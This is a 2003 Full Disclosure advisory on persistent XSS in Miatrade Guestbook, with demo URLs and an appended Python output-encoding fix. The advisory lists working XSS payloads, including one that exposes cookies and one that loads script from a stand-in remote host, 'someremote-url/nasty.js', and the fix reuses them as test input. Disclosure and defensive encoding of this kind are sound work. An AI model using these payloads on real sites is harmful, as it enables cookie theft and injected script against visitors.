Full Disclosure mailing list archives
Miatrade Guestbook - Persistent XSS
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sun, 24 Aug 2003 15:12:15 -0700
------------------------------------------------------------------
        - EXPL-A-2003-021 exploitlabs.com Advisory 021
------------------------------------------------------------------
                  -= Miatrade Guestbook =-

Aug 20, 2003
Donnie Werner
morning_wood () exploitlabs com

Product:
--------
Miatrade guestbook
http://www.miatrade.com
http://www.google.com/keyword/Miatrade+Guestbook

Vulnerability:
----------------
1. persistent XSS

Description of product:
-----------------------
"Miatrade Guestbook gives you the ability to gather information from your
visitors. They can post a public message that may include: Name, E-mail,
url, Home page and Comments about your site. Miatrade guestbook lets you
keep in touch with who's visiting your site and is a great way to make
your site more interactive and keep visitors coming back."

VULNERABILITY / EXPLOIT
======================
Miatrade guestbook does not filter HTML code from user-supplied input.
A remote user can create a specially crafted URL that, when loaded by a
target user, will cause arbitrary scripting code to be executed by the
target user's browser. The code will originate from the site running the
Miatrade guestbook software and will run in the security context of that
site.

persistent XSS rendered in fields:

[name] - <script>alert("You are vunerable to xss")</script>
[homepage] - <script>document.write(document.cookie)</script>
[message] - <script language="JavaScript" src="http://someremote-url/nasty.js" type="text/javascript"></script>

live examples:

demo - sign http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi
demo - view http://www.miatrade.com/cgi-bin/guest/view.pl?fibi

Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
Concurrent with this advisory
info () miatrade com

Credits:
--------
Donnie Werner
co-founder / CTO e2-labs.com
morning_wood () e2-labs com
http://exploitlabs.com
http://nothackers.org/about.php

Original advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
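
Added example (not part of the original advisory and not Miatrade's code): a sketch of how a guestbook's view page can encode the three stored fields on output, so the values listed in the advisory are displayed as text instead of being interpreted as markup. The function names, the HTML layout and the http/https-only rule for the homepage field are assumptions made for this illustration.

```python
import html
from urllib.parse import urlsplit

# Assumption: a homepage link only ever needs to be an absolute web URL.
ALLOWED_SCHEMES = {"http", "https"}


def safe_homepage(url):
    """Return the URL if it is an absolute http(s) link, otherwise None."""
    url = url.strip()
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme.lower() in ALLOWED_SCHEMES and parts.netloc:
        return url
    return None


def render_entry(name, homepage, message):
    """Render one stored entry as an HTML fragment (hypothetical layout).

    Every stored value is encoded at output time, whatever filtering was
    or was not done when the entry was signed.
    """
    out = ['<div class="entry">']
    # Text context: &, <, > and both quote characters become entities.
    out.append("<b>%s</b>" % html.escape(name, quote=True))
    link = safe_homepage(homepage)
    if link is not None:
        # Attribute context: scheme allowlist first, then entity encoding
        # so a quote in the URL cannot close the href attribute.
        href = html.escape(link, quote=True)
        out.append('<a href="%s" rel="nofollow noopener">%s</a>' % (href, href))
    body = html.escape(message, quote=True).replace("\n", "<br>")
    out.append("<p>%s</p>" % body)
    out.append("</div>")
    return "\n".join(out)


# The three field values listed in the advisory, used as test input.
ADVISORY_FIELDS = (
    '<script>alert("You are vunerable to xss")</script>',
    "<script>document.write(document.cookie)</script>",
    '<script language="JavaScript" src="http://someremote-url/nasty.js" '
    'type="text/javascript"></script>',
)

if __name__ == "__main__":
    print(render_entry(*ADVISORY_FIELDS))
    print(render_entry("Visitor", "http://example.com/", "Nice site"))
```

Encoding at render time also covers entries that were stored before any input filter existed.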